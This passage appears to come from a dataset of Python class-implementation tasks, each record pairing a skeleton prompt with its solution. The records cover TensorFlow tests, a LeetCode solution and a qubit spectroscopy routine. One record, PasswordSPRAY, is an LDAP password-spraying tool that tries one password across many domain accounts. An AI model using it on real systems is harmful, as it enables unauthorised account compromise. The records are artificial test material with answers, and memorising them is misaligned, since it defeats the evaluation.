layers.multi_class_target(n_classes=2)\n classifier = LinearEstimator(target_column, feature_columns=[age, language])\n classifier.fit(input_fn=input_fn, steps=1000)\n loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n classifier.fit(input_fn=input_fn, steps=2000)\n loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n self.assertLess(loss2, loss1)\n self.assertLess(loss2, 0.01)\n<|end_body_0|>\n\n<|body_start_1|>\n cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\n target_column = layers.multi_class_target(n_classes=3)\n classifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\n classifier.fit(input_fn=_iris_input_fn, steps=1000)\n classifier.evaluate(input_fn=_iris_input_fn, steps=100)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ComposableModelTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ComposableModelTest:\n\n def testLinearModel(self):\n \"\"\"Tests that loss goes down with training.\"\"\"\n <|body_0|>\n\n def testDNNModel(self):\n \"\"\"Tests multi-class classification using matrix data as input.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\n language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\n age = tf.contrib.layers.real_valued_column('age')\n target_column = layers.multi_class_target(n_classes=2)\n classifier = LinearEstimator(target_column, feature_columns=[age, language])\n 
classifier.fit(input_fn=input_fn, steps=1000)\n loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n classifier.fit(input_fn=input_fn, steps=2000)\n loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n self.assertLess(loss2, loss1)\n self.assertLess(loss2, 0.01)\n<|end_body_0|>\n\n<|body_start_1|>\n cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\n target_column = layers.multi_class_target(n_classes=3)\n classifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\n classifier.fit(input_fn=_iris_input_fn, steps=1000)\n classifier.evaluate(input_fn=_iris_input_fn, steps=100)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000069", "length_bytes": 4936, "license_type": "permissive", "methods": [{"docstring": "Tests that loss goes down with training.", "name": "testLinearModel", "signature": "def testLinearModel(self)"}, {"docstring": "Tests multi-class classification using matrix data as input.", "name": "testDNNModel", "signature": "def testDNNModel(self)"}], "n_methods": 2, "prompt": "Implement the Python class `ComposableModelTest` described below.\n\nClass description:\nImplement the ComposableModelTest class.\n\nMethod signatures and docstrings:\n- def testLinearModel(self): Tests that loss goes down with training.\n- def testDNNModel(self): Tests multi-class classification using matrix data as input.", "prompted_full_text": "Implement the Python class `ComposableModelTest` described below.\n\nClass description:\nImplement the ComposableModelTest class.\n\nMethod signatures and docstrings:\n- def testLinearModel(self): Tests that loss goes down with training.\n- def testDNNModel(self): Tests multi-class classification using matrix data as input.\n\n<|skeleton|>\nclass ComposableModelTest:\n\n def testLinearModel(self):\n \"\"\"Tests that loss goes down with training.\"\"\"\n <|body_0|>\n\n def testDNNModel(self):\n \"\"\"Tests multi-class classification using matrix data as input.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\n language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\n age = tf.contrib.layers.real_valued_column('age')\n target_column = layers.multi_class_target(n_classes=2)\n classifier = LinearEstimator(target_column, feature_columns=[age, language])\n classifier.fit(input_fn=input_fn, steps=1000)\n loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n classifier.fit(input_fn=input_fn, steps=2000)\n loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n self.assertLess(loss2, loss1)\n self.assertLess(loss2, 0.01)\n<|end_body_0|>\n\n<|body_start_1|>\n cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\n target_column = layers.multi_class_target(n_classes=3)\n classifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\n classifier.fit(input_fn=_iris_input_fn, steps=1000)\n classifier.evaluate(input_fn=_iris_input_fn, steps=100)\n<|end_body_1|>\n", "revision_id": "6d39eeb66c63a6f0f7895befc588c9eb1dd105f9", "skeleton": "<|skeleton|>\nclass ComposableModelTest:\n\n def testLinearModel(self):\n \"\"\"Tests that loss goes down with training.\"\"\"\n <|body_0|>\n\n def testDNNModel(self):\n \"\"\"Tests multi-class classification using matrix data as input.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", 
"snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ComposableModelTest:\n def testLinearModel(self):\n \"\"\"Tests that loss goes down with training.\"\"\"\n def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\n language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\n age = tf.contrib.layers.real_valued_column('age')\n target_column = layers.multi_class_target(n_classes=2)\n classifier = LinearEstimator(target_column, feature_columns=[age, language])\n classifier.fit(input_fn=input_fn, steps=1000)\n loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n classifier.fit(input_fn=input_fn, steps=2000)\n loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n self.assertLess(loss2, loss1)\n self.assertLess(loss2, 0.01)\n\n def testDNNModel(self):\n \"\"\"Tests multi-class classification using matrix data as input.\"\"\"\n cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\n target_column = layers.multi_class_target(n_classes=3)\n classifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\n classifier.fit(input_fn=_iris_input_fn, steps=1000)\n classifier.evaluate(input_fn=_iris_input_fn, steps=100)\n", "source": "the_stack_v2_python_sparse", "source_path": "jni-build/jni/include/tensorflow/contrib/learn/python/learn/estimators/composable_model_test.py", "source_repo": "Lab603/PicEncyclopedias", "split": "test", "star_events_count": 6} {"blob_id": "d8e4e6c538261220281f8af300add7742b332b82", "bodies": ["d = {}\nk = {}\nstart = 0\nstep = 0\nfor i in range(8):\n start = start | cells[i] << i\nd[start] = step\nk[step] = start\nnn = 0\nwhile nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\nans = [0] * 8\nfor i in range(8):\n ans[i] = start >> i & 1\nreturn ans", "d = {}\nk = {}\nstart = 0\nstep = 0\nfor i in range(8):\n start = start | cells[i] << i\nd[start] = step\nk[step] = start\nnn = 0\nwhile nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\nans = [0] * 8\nfor i in range(8):\n ans[i] = start >> i & 1\nreturn ans"], "bodies_text": "<|body_start_0|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def prisonAfterNDays(self, cells, N):\n \"\"\":type cells: List[int] :type 
N: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def raw(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000070", "length_bytes": 1587, "license_type": "no_license", "methods": [{"docstring": ":type cells: List[int] :type N: int :rtype: List[int]", "name": "prisonAfterNDays", "signature": "def prisonAfterNDays(self, cells, N)"}, {"docstring": ":type cells: List[int] :type N: int :rtype: List[int]", "name": "raw", "signature": "def raw(self, cells, N)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001077", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def prisonAfterNDays(self, cells, N): :type cells: List[int] :type N: int :rtype: List[int]\n- def raw(self, cells, N): :type cells: List[int] :type N: int :rtype: List[int]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def prisonAfterNDays(self, cells, N): :type cells: List[int] :type N: int :rtype: List[int]\n- def raw(self, cells, N): :type cells: List[int] :type N: int :rtype: List[int]\n\n<|skeleton|>\nclass Solution:\n\n def prisonAfterNDays(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def raw(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_1|>\n", "revision_id": "8075fbb40987d5e6af8d30941a19fa48a3320f56", "skeleton": "<|skeleton|>\nclass Solution:\n\n def prisonAfterNDays(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def raw(self, cells, N):\n 
\"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def prisonAfterNDays(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n\n def raw(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "p957/Solution.py", "source_repo": "carwestsam/leetCode", "split": "test", "star_events_count": 4} {"blob_id": "a164b4fa59a69e1154a25238695a2d4c0fc69a16", "bodies": ["self.__domain = domainName\nself.__kdcHost = serverIP\nself.__domainUsers = domainusers\nself.__sprayPassword = sprayPassword\nself.DomainUserRequest()", "domain = '@' + self.__domain\nfor user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)", "self.__sprayusers = []\nsimpleServer = Server(self.__kdcHost, get_info='ALL')\nsimpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\nif simpleConn.bind():\n self.__sprayusers.append(username)"], "bodies_text": "<|body_start_0|>\n self.__domain = domainName\n self.__kdcHost = serverIP\n self.__domainUsers = domainusers\n self.__sprayPassword = sprayPassword\n self.DomainUserRequest()\n<|end_body_0|>\n\n<|body_start_1|>\n domain = '@' + self.__domain\n for user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)\n<|end_body_1|>\n\n<|body_start_2|>\n self.__sprayusers = []\n simpleServer = Server(self.__kdcHost, get_info='ALL')\n simpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\n if simpleConn.bind():\n self.__sprayusers.append(username)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "PasswordSPRAY", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PasswordSPRAY:\n\n def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName):\n \"\"\"Spray Attack Arguments\"\"\"\n <|body_0|>\n\n def DomainUserRequest(self):\n \"\"\"Pars to Domain\"\"\"\n <|body_1|>\n\n def AttackToTarget(self, username):\n \"\"\"Attack Part\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__domain = domainName\n self.__kdcHost = serverIP\n self.__domainUsers = domainusers\n self.__sprayPassword = sprayPassword\n self.DomainUserRequest()\n<|end_body_0|>\n\n<|body_start_1|>\n domain = '@' + self.__domain\n for user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)\n<|end_body_1|>\n\n<|body_start_2|>\n self.__sprayusers = []\n simpleServer = Server(self.__kdcHost, get_info='ALL')\n simpleConn 
= Connection(simpleServer, user=username, password=self.__sprayPassword)\n if simpleConn.bind():\n self.__sprayusers.append(username)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000071", "length_bytes": 1067, "license_type": "permissive", "methods": [{"docstring": "Spray Attack Arguments", "name": "AttackArguments", "signature": "def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName)"}, {"docstring": "Pars to Domain", "name": "DomainUserRequest", "signature": "def DomainUserRequest(self)"}, {"docstring": "Attack Part", "name": "AttackToTarget", "signature": "def AttackToTarget(self, username)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001412", "prompt": "Implement the Python class `PasswordSPRAY` described below.\n\nClass description:\nImplement the PasswordSPRAY class.\n\nMethod signatures and docstrings:\n- def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName): Spray Attack Arguments\n- def DomainUserRequest(self): Pars to Domain\n- def AttackToTarget(self, username): Attack Part", "prompted_full_text": "Implement the Python class `PasswordSPRAY` described below.\n\nClass description:\nImplement the PasswordSPRAY class.\n\nMethod signatures and docstrings:\n- def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName): Spray Attack Arguments\n- def DomainUserRequest(self): Pars to Domain\n- def AttackToTarget(self, username): Attack Part\n\n<|skeleton|>\nclass PasswordSPRAY:\n\n def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName):\n \"\"\"Spray Attack Arguments\"\"\"\n <|body_0|>\n\n def DomainUserRequest(self):\n \"\"\"Pars to Domain\"\"\"\n <|body_1|>\n\n def AttackToTarget(self, username):\n \"\"\"Attack Part\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__domain = domainName\n self.__kdcHost = serverIP\n self.__domainUsers = domainusers\n self.__sprayPassword = sprayPassword\n self.DomainUserRequest()\n<|end_body_0|>\n\n<|body_start_1|>\n domain = '@' + self.__domain\n for user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)\n<|end_body_1|>\n\n<|body_start_2|>\n self.__sprayusers = []\n simpleServer = Server(self.__kdcHost, get_info='ALL')\n simpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\n if simpleConn.bind():\n self.__sprayusers.append(username)\n<|end_body_2|>\n", "revision_id": "92263ea73bd2eaa2081fb277c76aa229103a1d54", "skeleton": "<|skeleton|>\nclass PasswordSPRAY:\n\n def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName):\n \"\"\"Spray Attack Arguments\"\"\"\n <|body_0|>\n\n def DomainUserRequest(self):\n \"\"\"Pars to Domain\"\"\"\n <|body_1|>\n\n def AttackToTarget(self, username):\n \"\"\"Attack Part\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PasswordSPRAY:\n def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName):\n \"\"\"Spray Attack Arguments\"\"\"\n self.__domain = domainName\n self.__kdcHost = serverIP\n self.__domainUsers = domainusers\n self.__sprayPassword = sprayPassword\n self.DomainUserRequest()\n\n def DomainUserRequest(self):\n \"\"\"Pars to Domain\"\"\"\n domain = '@' + self.__domain\n for user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)\n\n def AttackToTarget(self, username):\n \"\"\"Attack Part\"\"\"\n self.__sprayusers = []\n 
simpleServer = Server(self.__kdcHost, get_info='ALL')\n simpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\n if simpleConn.bind():\n self.__sprayusers.append(username)\n", "source": "the_stack_v2_python_sparse", "source_path": "pentestui/pentest_api/enumeration/ldap/spray/sprayattack.py", "source_repo": "mustgundogdu/PentestUI", "split": "test", "star_events_count": 31} {"blob_id": "265d8e1b2f842eb1761661a7212ee27d8a02a985", "bodies": ["super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\nself.fluxlines_dict = fluxlines_dict\nroutines_utils.append_DCsources(self)\nself.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\nfor qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\nself._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\nself.final_init(**kw)", "super().create_routine_template()\nfor i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)", "for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\nif self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\nsuper().post_run()"], "bodies_text": "<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\n self.fluxlines_dict = fluxlines_dict\n routines_utils.append_DCsources(self)\n self.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\n for qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\n self._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 
'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)\n<|end_body_1|>\n\n<|body_start_2|>\n for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\n if self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\n super().post_run()\n<|end_body_2|>\n", "class_docstring": "AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2", "class_name": "ParkAndQubitSpectroscopy", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ParkAndQubitSpectroscopy:\n \"\"\"AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\"\"\"\n\n def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw):\n \"\"\"Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. 
fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates routine template.\"\"\"\n <|body_1|>\n\n def post_run(self):\n \"\"\"Save the results of the routine.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\n self.fluxlines_dict = fluxlines_dict\n routines_utils.append_DCsources(self)\n self.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\n for qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\n self._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)\n<|end_body_1|>\n\n<|body_start_2|>\n for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\n if self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\n super().post_run()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000072", "length_bytes": 9956, "license_type": "permissive", "methods": [{"docstring": "Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. 
fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta", "name": "__init__", "signature": "def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw)"}, {"docstring": "Creates routine template.", "name": "create_routine_template", "signature": "def create_routine_template(self)"}, {"docstring": "Save the results of the routine.", "name": "post_run", "signature": "def post_run(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002126", "prompt": "Implement the Python class `ParkAndQubitSpectroscopy` described below.\n\nClass description:\nAutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\n\nMethod signatures and docstrings:\n- def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw): Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\n- def create_routine_template(self): Creates routine template.\n- def post_run(self): Save the results of the routine.", "prompted_full_text": "Implement the Python class `ParkAndQubitSpectroscopy` described below.\n\nClass description:\nAutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and 